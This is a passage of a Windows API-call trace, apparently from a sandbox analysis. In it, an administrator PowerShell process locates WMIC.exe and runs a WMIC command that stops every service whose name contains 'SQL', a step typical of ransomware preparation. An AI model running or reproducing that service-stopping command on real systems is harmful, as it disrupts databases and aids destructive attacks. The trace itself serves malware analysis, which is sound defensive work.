lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.297] SetErrorMode (uMode=0x1) returned 0x1 [0247.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.298] SetErrorMode (uMode=0x1) returned 0x1 [0247.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.298] SetErrorMode (uMode=0x1) returned 0x1 [0247.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.298] SetErrorMode (uMode=0x1) returned 0x1 [0247.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.299] SetErrorMode (uMode=0x1) returned 0x1 [0247.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.299] SetErrorMode (uMode=0x1) returned 0x1 [0247.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.299] SetErrorMode (uMode=0x1) returned 0x1 [0247.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.300] SetErrorMode (uMode=0x1) returned 0x1 [0247.300] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.300] SetErrorMode (uMode=0x1) returned 0x1 [0247.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.301] SetErrorMode (uMode=0x1) returned 0x1 [0247.301] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.301] SetErrorMode (uMode=0x1) returned 0x1 [0247.301] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.301] SetErrorMode (uMode=0x1) returned 0x1 [0247.302] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.302] SetErrorMode (uMode=0x1) returned 0x1 [0247.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.302] SetErrorMode (uMode=0x1) returned 0x1 [0247.302] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.303] SetErrorMode (uMode=0x1) returned 0x1 [0247.303] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.303] SetErrorMode (uMode=0x1) returned 0x1 [0247.303] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.304] SetErrorMode (uMode=0x1) returned 0x1 [0247.304] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.304] SetErrorMode (uMode=0x1) returned 0x1 [0247.304] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.304] SetErrorMode (uMode=0x1) returned 0x1 [0247.305] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.305] SetErrorMode (uMode=0x1) returned 0x1 [0247.305] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.305] SetErrorMode (uMode=0x1) returned 0x1 [0247.305] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.306] SetErrorMode (uMode=0x1) returned 0x1 [0247.306] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.306] SetErrorMode (uMode=0x1) returned 0x1 [0247.306] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.306] SetErrorMode (uMode=0x1) returned 0x1 [0247.306] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.307] SetErrorMode (uMode=0x1) returned 0x1 [0247.307] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.307] SetErrorMode (uMode=0x1) returned 0x1 [0247.307] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.307] SetErrorMode (uMode=0x1) returned 0x1 [0247.308] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.308] SetErrorMode (uMode=0x1) returned 0x1 [0247.308] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.308] SetErrorMode (uMode=0x1) returned 0x1 [0247.308] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.308] SetErrorMode (uMode=0x1) returned 0x1 [0247.309] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.309] SetErrorMode (uMode=0x1) returned 0x1 [0247.309] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.309] SetErrorMode (uMode=0x1) returned 0x1 [0247.309] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.310] SetErrorMode (uMode=0x1) returned 0x1 [0247.310] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.310] SetErrorMode (uMode=0x1) returned 0x1 [0247.310] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.310] SetErrorMode (uMode=0x1) returned 0x1 [0247.310] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0247.311] SetErrorMode (uMode=0x1) returned 0x1 [0247.311] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.311] SetErrorMode (uMode=0x1) returned 0x1 [0247.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0247.311] SetErrorMode (uMode=0x1) returned 0x1 [0247.311] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.312] SetErrorMode (uMode=0x1) returned 0x1 [0247.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0247.312] SetErrorMode (uMode=0x1) returned 0x1 [0247.312] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.312] SetErrorMode (uMode=0x1) returned 0x1 [0247.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0247.313] SetErrorMode (uMode=0x1) returned 0x1 [0247.313] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.313] SetErrorMode (uMode=0x1) returned 0x1 [0247.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0247.313] SetErrorMode (uMode=0x1) returned 0x1 [0247.313] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.314] SetErrorMode (uMode=0x1) returned 0x1 [0247.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0247.314] SetErrorMode (uMode=0x1) returned 0x1 [0247.314] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0247.314] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c8ed970 | out: lpFindFileData=0x1c8ed970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0247.315] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0247.315] SetErrorMode (uMode=0x1) returned 0x1 [0247.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c8eda80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0247.316] SetErrorMode (uMode=0x1) returned 0x1 [0247.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8edc90 | out: lpFileInformation=0x1c8edc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0247.316] SetErrorMode (uMode=0x1) returned 0x1 [0247.317] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0247.317] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8ede78, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ede78) returned 0x4550 [0247.318] CoTaskMemFree (pv=0x1b9b1010) [0247.318] GetConsoleWindow () returned 0x5011e [0247.318] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0247.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.318] CoTaskMemFree (pv=0x2af7b0) [0247.319] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0247.319] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.319] CoTaskMemFree (pv=0x2af7b0) [0247.319] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice", pNumArgs=0x1c8edec0 | out: pNumArgs=0x1c8edec0) returned 0x1ee760*="" [0247.319] lstrlenW (lpString="path") returned 4 [0247.319] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa8d0 [0247.319] RtlMoveMemory (in: Destination=0x1b9aa8d0, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9aa8d0) [0247.319] CoTaskMemFree (pv=0x1b9aa8d0) [0247.319] lstrlenW (lpString="Win32_Service") returned 13 [0247.319] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0247.319] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0247.319] CoTaskMemFree (pv=0x1b9b1010) [0247.319] lstrlenW (lpString="where") returned 5 [0247.319] CoTaskMemAlloc (cb=0xe) returned 0x1b9aa8d0 [0247.319] RtlMoveMemory (in: Destination=0x1b9aa8d0, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9aa8d0) [0247.319] CoTaskMemFree (pv=0x1b9aa8d0) [0247.320] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0247.320] CoTaskMemAlloc (cb=0x2a) returned 0x1b9c7170 [0247.320] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x28 | out: Destination=0x1b9c7170) [0247.320] CoTaskMemFree (pv=0x1b9c7170) [0247.320] lstrlenW (lpString="call") returned 4 [0247.320] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa8d0 [0247.320] RtlMoveMemory (in: Destination=0x1b9aa8d0, Source=0x1ee7fc, Length=0xa | out: Destination=0x1b9aa8d0) [0247.320] CoTaskMemFree (pv=0x1b9aa8d0) [0247.320] lstrlenW (lpString="stopservice") returned 11 [0247.320] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0247.320] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee806, Length=0x18 | out: Destination=0x1b9b1010) [0247.320] CoTaskMemFree (pv=0x1b9b1010) [0247.320] LocalFree (hMem=0x1ee760) returned 0x0 [0247.320] CoTaskMemAlloc (cb=0x804) returned 0x1b9de290 [0247.320] GetConsoleTitleW (in: lpConsoleTitle=0x1b9de290, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0247.321] CoTaskMemFree (pv=0x1b9de290) [0247.321] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0247.321] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c8ede20*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3180078 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice", lpProcessInformation=0x3180078*(hProcess=0x630, hThread=0x62c, dwProcessId=0xb78, dwThreadId=0x890)) returned 1 [0247.325] CoTaskMemFree (pv=0x253f20) [0247.325] CloseHandle (hObject=0x62c) returned 1 [0247.325] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0247.325] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8edec8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8edec8) returned 0x4550 [0247.326] CoTaskMemFree (pv=0x1b9b1010) [0247.326] GetCurrentProcess () returned 0xffffffffffffffff [0247.326] GetCurrentProcess () returned 0xffffffffffffffff [0247.326] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x630, 